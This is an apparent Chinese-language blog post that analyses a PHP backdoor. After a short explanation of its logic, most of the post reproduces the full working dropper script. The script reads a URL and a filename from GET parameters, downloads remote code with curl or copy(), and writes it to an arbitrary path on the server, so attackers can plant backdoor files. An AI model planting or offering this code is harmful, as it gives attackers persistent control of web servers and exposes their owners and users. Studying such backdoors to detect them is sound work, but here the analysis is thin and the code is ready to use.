php后门工具代码分析和参考

224次阅读
没有评论

这段代码的核心逻辑就是通过 HTTP 请求接收参数中的 url 及其它信息,然后通过 curl stream_context_create 获取 url 返回的代码,并写入到指定的文件中,从而实现后门入口文件的写入。

对于使用 stream_context_create 来进行 HTTP 请求,在正常的项目开发中确实也很少见。

 

<?php
set_time_limit(0);

if(isset($_GET['url']) && isset($_GET['filename'])){if(httpcopy($_GET['url'], $_GET['filename'])){echo("Done.");
    }else{echo("Down Error.");
    }
}else{die('Input error.');
}

function httpcopy($url, $file="", $timeout=60) {$file = empty($file) ? pathinfo($url,PATHINFO_BASENAME) : $file;
    $dir = pathinfo($file,PATHINFO_DIRNAME);
    !is_dir($dir) && @mkdir($dir,0755,true);
    $url = str_replace("","%20",$url);

    if(function_exists('curl_init')) {
        echo "curl";
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
        $temp = curl_exec($ch);
        if(@file_put_contents($file, $temp) && !curl_error($ch)) {return $file;} else {return false;}
    } else {
        echo "copy";
        $opts = array(
            "http"=>array(
            "method"=>"GET",
            "header"=>"","timeout"=>$timeout)
        );

        $context = stream_context_create($opts);
        if(@copy($url, $file, $context)) {
            //$http_response_header
            return $file;
        } else {return false;}
    }
}
?>

 

正文完
有偿技术支持加微信
post-qrcode
PHP代码安全 PHP后门
发表至: 编码笔记
2023-10-04
 
php关于字符集一些相关的函数
curl简单请求函数
培养自己的php编码规范
PhpSpreadsheet 基本使用和导入 导出 模版生成Excel文件
评论(没有评论)
验证码
文章搜索
随机文章
标签云
ajaxAndroid APPAPI接口APP备案APP支付BBS论坛bug排查ChatGPTChrome浏览器CMD命令CMS内容管理系统composer工具包composer镜像curl并发请求curl扩展DNS服务器EasyWeChatemoji字符Excelfavicon图标FTPGatewayWorkerGitGoFoundGoLangheader头html表单http keep-alviehttp请求IMAP扩展JadxGUI工具javascriptjqueryJS正则js自定义函数laravel框架LinuxMongoDb